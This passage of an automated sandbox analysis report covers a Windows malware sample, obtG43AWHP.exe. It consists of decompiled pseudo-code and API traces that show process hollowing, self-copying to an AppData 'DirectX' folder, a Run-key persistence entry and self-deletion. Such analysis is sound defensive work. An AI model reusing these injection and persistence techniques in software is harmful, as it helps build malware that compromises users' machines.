					_v8 = _t39;
				}
				L19:
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E004138C9);
				return E00403E88( &_v12);
			}












    0x00413827
    0x0041382a
    0x00413830
    0x00413831
    0x00413836
    0x00413839
    0x0041383e
    0x00413843
    0x00413845
    0x004138a4
    0x00413849
    0x0041384e
    0x0041384e
    0x00413852
    0x00000000
    0x00000000
    0x0041384d
    0x0041384d
    0x00413864
    0x00413873
    0x00413877
    0x0041388a
    0x0041388a
    0x0041388e
    0x00413893
    0x00413895
    0x00413895
    0x00413899
    0x0041389b
    0x0041389b
    0x0041389f
    0x004138a1
    0x004138a1
    0x004138a2
    0x00000000
    0x004138a2
    0x00000000
    0x0041388e
    0x004138a9
    0x004138a9
    0x004138ac
    0x004138ae
    0x004138b1
    0x004138b4
    0x004138c1

    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0041498C, Relevance: 5.0, Strings: 4, Instructions: 50
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
				signed int _t7;
				void* _t8;
				void* _t17;
				void* _t29;

				_push(__ecx);
				_t29 = __edx;
				_t17 = __eax;
				_t7 = E004155CC(__ecx) & 0x0000007f;
				if(_t7 > 0xd) {
					L7:
					_t8 = E00413A2C();
				} else {
					_t1 = _t7 + E004149B3; // 0x5
					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
						case 0:
							goto L7;
						case 1:
							E00413F54(_t17, 1, _t30);
							E00403F78(_t29,  *_t30, 0);
							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
							goto L8;
						case 2:
							__eax = __esi;
							__edx = 0x414a58;
							__eax = E00403EDC(__esi, 0x414a58);
							goto L8;
						case 3:
							__eax = __esi;
							__edx = 0x414a68;
							__eax = E00403EDC(__esi, 0x414a68);
							goto L8;
						case 4:
							__eax = __esi;
							__edx = 0x414a78;
							__eax = E00403EDC(__esi, 0x414a78);
							goto L8;
						case 5:
							__eax = __esi;
							__edx = 0x414a84;
							__eax = E00403EDC(__esi, 0x414a84);
							goto L8;
					}
				}
				L8:
				return _t8;
			}







    0x0041498e
    0x0041498f
    0x00414991
    0x0041499a
    0x004149a0
    0x00414a44
    0x00414a44
    0x004149a6
    0x004149a6
    0x004149ac
    0x00000000
    0x00000000
    0x00000000
    0x004149e2
    0x004149f0
    0x00414a05
    0x00000000
    0x00000000
    0x00414a0c
    0x00414a0e
    0x00414a13
    0x00000000
    0x00000000
    0x00414a1a
    0x00414a1c
    0x00414a21
    0x00000000
    0x00000000
    0x00414a28
    0x00414a2a
    0x00414a2f
    0x00000000
    0x00000000
    0x00414a36
    0x00414a38
    0x00414a3d
    0x00000000
    0x00000000
    0x004149ac
    0x00414a49
    0x00414a4c

    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040AC28, Relevance: 5.0, Strings: 4, Instructions: 28
    C-Code - Quality: 100%
    			E0040AC28() {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;

				_t12 =  *0x452f70; // 0x405e70
				 *0x45478c = E0040A628(_t12, 1);
				_t13 =  *0x453040; // 0x405ef0
				 *0x454790 = E0040A628(_t13, 1);
				_t5 =  *0x452f34; // 0x454008
				 *_t5 = 0x40a7a4;
				_t6 =  *0x452fa8; // 0x454004
				 *_t6 = E0040AC18;
				_t7 =  *0x452f64; // 0x45401c
				_t16 =  *0x406188; // 0x4061d4
				 *_t7 = _t16;
				_t8 =  *0x452f98; // 0x45400c
				 *_t8 = E0040A968;
				_t9 =  *0x452fac; // 0x454010
				 *_t9 = E0040AB4C;
				_t17 =  *0x453054; // 0x454020
				 *_t17 = E0040A8B4;
				_t18 =  *0x452f24; // 0x454028
				 *_t18 = E0040A8D0;
				return E0040A8D0;
			}













    0x0040ac28
    0x0040ac3a
    0x0040ac3f
    0x0040ac51
    0x0040ac56
    0x0040ac5b
    0x0040ac61
    0x0040ac66
    0x0040ac6c
    0x0040ac71
    0x0040ac77
    0x0040ac79
    0x0040ac7e
    0x0040ac84
    0x0040ac89
    0x0040ac94
    0x0040ac9a
    0x0040aca1
    0x0040aca7
    0x0040aca9

    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3204 Parent PID: 3192

    Executed Functions

    Function 0028E080, Relevance: 16.7, APIs: 11, Instructions: 244
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0028E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0028E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0028E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0028E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0028E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0028E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0028E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0028E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0028E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0028E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0028E35A
    Memory Dump Source
    • Source File: 00000007.00000002.1489574331.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_28d000_obtG43AWHP.jbxd
    Function 0028E380, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0028E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0028E4B6
      • Part of subcall function 0028E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0028E0C6
      • Part of subcall function 0028E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0028E0DC
      • Part of subcall function 0028E080: CreateProcessA.KERNEL32(?,00000000), ref: 0028E1C2
      • Part of subcall function 0028E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0028E1F0
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.1489574331.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_28d000_obtG43AWHP.jbxd
    Function 0028E510, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0028E54C
      • Part of subcall function 0028E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0028E493
      • Part of subcall function 0028E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0028E4B6
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.1489574331.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_28d000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 0028DFB2, Relevance: .1, Instructions: 61
    Memory Dump Source
    • Source File: 00000007.00000002.1489574331.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_28d000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3220 Parent PID: 3204

    Executed Functions

    Function 00404FC0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4050c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404E08( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004050CC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401248();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401250();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401248();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401248();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401248();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























    0x00404fc1
    0x00404fc3
    0x00404fcb
    0x00404fdc
    0x00404fe1
    0x00404ffa
    0x00405001
    0x00405043
    0x00405045
    0x00405046
    0x0040504b
    0x0040504e
    0x00405051
    0x00405063
    0x00405086
    0x004050a6
    0x004050a6
    0x004050aa
    0x004050b0
    0x004050b3
    0x004050b6
    0x004050c4
    0x00405003
    0x00405018
    0x0040501f
    0x00000000
    0x00405021
    0x00405036
    0x0040503d
    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512b
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00405143
    0x004051ed
    0x00000000
    0x00000000
    0x00000000
    0x0040503d
    0x0040501f

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 004050CC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
    C-Code - Quality: 61%
    			E004050CC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401248();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401250();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401248();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401248();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401248();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x004051e6
    0x004051ed
    0x00405113
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512f
    0x0040512b
    0x00000000
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00000000
    0x00405143

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00418750, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char* _t52;
				void* _t80;
				char* _t87;
				char* _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t125;
				intOrPtr _t139;
				intOrPtr _t140;

				_t137 = __esi;
				_t136 = __edi;
				_t139 = _t140;
				_t110 = 8;
				do {
					_push(0);
					_push(0);
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				_push(_t110);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t139);
				_push(0x418974);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				if(E00402944(__ebx, __esi) == 0) {
					E004029A4(0,  &_v12);
					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
					E00403D1C();
				}
				_push(_t139);
				_push(0x418925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				E004029A4(1,  &_v16);
				_t109 = E00407138(_v16, 0);
				_t144 = _t109 - 0x10;
				if(_t109 == 0x10) {
					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
					E004186D0(_v8, _t109, _t110, _t144);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
					_push(_v20);
					E00406EFC("DX9 C++RTL",  &_v28);
					_pop(_t125);
					E004185E8(_v28, _t109, _t125);
					E004029A4(0,  &_v36);
					E00406EFC(_v36,  &_v32);
					_push(_v32);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
					_pop(_t80);
					E00404294(_t80, _v40);
					if(0 == 0) {
						__eflags = 1;
						E00406FFC( &_v60);
						_t87 = E00404348(_v60);
						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
					} else {
						_push(1);
						_push(0);
						E00406FFC( &_v52);
						_push(_v52);
						_push(" DEL \"");
						E004029A4(0,  &_v56);
						E00404208();
						_t99 = E00404348(_v48);
						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
					}
					E00403D1C();
				}
				if(_t109 < 0x20) {
					E00406FFC( &_v64);
					_t52 = E00404348(_v64);
					E004029A4(0,  &_v68);
					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
					E00403D1C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E0041897B);
				return E00403EAC( &_v72, 0x11);
			}































    0x00418750
    0x00418750
    0x00418751
    0x00418753
    0x00418758
    0x00418758
    0x0041875a
    0x0041875c
    0x0041875c
    0x0041875f
    0x00418760
    0x00418761
    0x00418762
    0x00418765
    0x00418766
    0x0041876b
    0x0041876e
    0x00418778
    0x00418788
    0x0041879a
    0x0041879f
    0x0041879f
    0x004187a6
    0x004187a7
    0x004187ac
    0x004187af
    0x004187ba
    0x004187c7
    0x004187c9
    0x004187cc
    0x004187da
    0x004187e2
    0x004187ef
    0x004187fa
    0x00418802
    0x0041880b
    0x00418813
    0x00418814
    0x0041881e
    0x00418829
    0x00418831
    0x0041883a
    0x00418845
    0x0041884d
    0x0041884e
    0x00418853
    0x004188b5
    0x004188b6
    0x004188be
    0x004188d1
    0x00418855
    0x00418855
    0x00418857
    0x00418861
    0x00418866
    0x00418869
    0x00418873
    0x00418888
    0x00418890
    0x004188a3
    0x004188a3
    0x004188d6
    0x004188d6
    0x004188de
    0x004188ec
    0x004188f4
    0x004188ff
    0x00418911
    0x00418916
    0x00418916
    0x0041891d
    0x00418920
    0x0041895b
    0x0041895e
    0x00418961
    0x00418973

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 004019B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
    C-Code - Quality: 68%
    			E004019B0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A66);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4545c4);
				L00401304();
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L0040130C();
				}
				E00401374(0x4545e4);
